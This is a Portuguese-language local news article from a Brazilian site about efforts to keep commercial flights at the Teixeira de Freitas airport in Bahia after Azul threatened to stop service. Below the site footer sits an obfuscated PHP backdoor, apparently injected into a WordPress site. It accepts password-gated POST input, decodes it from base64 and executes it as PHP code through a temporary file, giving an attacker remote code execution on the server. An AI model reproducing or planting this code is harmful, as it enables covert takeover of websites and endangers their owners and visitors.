• SEJA BEM-VINDO

Eujácio Dantas foi a Salvador em defesa dos voos no Aeroporto de Teixeira de Freitas

Publicado em: 26/11/2021 Atualizado:: novembro 26, 2021

 

Eujácio Dantas, ex-secretário de saúde de Teixeira de Freitas, tem se mostrado indignado com a possibilidade da suspensão dos voos no Aeroporto 9 de Maio. Afirmou que “o retrocesso é inaceitável” e que “é preciso agir na contramão da ruptura e manter a operacionalidade do aeroporto”. Após conversar com alguns vereadores, entre eles Joris se Gel, muito mais do que apenas opinar, ele partiu para a ação.

 

Nesta quinta-feira, 25, Eujácio esteve em Salvador em reunião com o Secretário de Infraestrutura do Estado, Marcus Cavalcanti, juntamente com a deputada Mirela Macedo. A pauta da conversa foi a garantia de que o Aeroporto 9 de Maio mantenha a oferta de voos comerciais.

 

Durante a reunião, o Secretário de Infraestrutura sinalizou que os voos comerciais devem continuar e que, caso a Companhia Azul suspenda a operação, outra empresa deverá assumir imediatamente. Na oportunidade, esclareceu que os investimentos necessários para que o aeroporto receba voos em condições metereológicas extremas vão além da aquisição de instrumentos, incluindo a manutenção na pista e obras de reestruturação muito maiores que envolvem, inclusive, a desapropriação de áreas adjacentes. Ressaltou, ainda, que um estudo técnico será providenciado pelo governo para realização de investimentos mais robustos.

 

Desde o início da segunda quinzena de novembro que a Azul Linhas Aéreas vem anunciando que não venderá mais passagens com destino ou partida de Teixeira de Freitas-BA. A companhia alega a falta de condições de voo em dias de chuva e/ou à noite. Sempre que um avião chega ao aeroporto e o piloto se depara com muitas nuvens, o voo precisa ser desviado para outros destinos, causando problemas aos clientes e à própria Azul.

 

O Aeroporto de Teixeira de Freitas é regional e compreende todo o Extremo Sul, com destaque para a Costa das Baleias até a fronteira com o nordeste de Minas Gerais e norte do Espírito Santo. A interrupção dos trabalhos representa um retrocesso turístico e econômico.

 

O aeroporto foi inaugurado em 1990, mas em 2002 os voos comerciais foram suspensos, situação que só mudou em 2014 depois de muitas negociações por parte dos representantes do Governo Municipal à época que não poupou esforços para agendar reuniões em Salvador e Brasília. Houve também um longo processo de reformas, homologações e de negociação com empresas aéreas.

 

No dia 10 de setembro de 2014 ocorreu o voo inaugural, com a presença do Governador, de autoridades locais e representantes da empresa aérea. O primeiro voo comercial, ligando a cidade de Teixeira de Freitas ao aeroporto de Confins em Belo Horizonte, ocorreu no dia 29 de setembro de 2014.

 

 

Além da garantia de que Teixeira de Freitas e região não ficará sem voos, o secretário ressaltou que está autorizando a licitação para a duplicação de 1,5 km da BA 290, saída para Medeiros Neto, conforme promessa do governador em recente visita à cidade.

 

Fonte: Liberdadenews


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}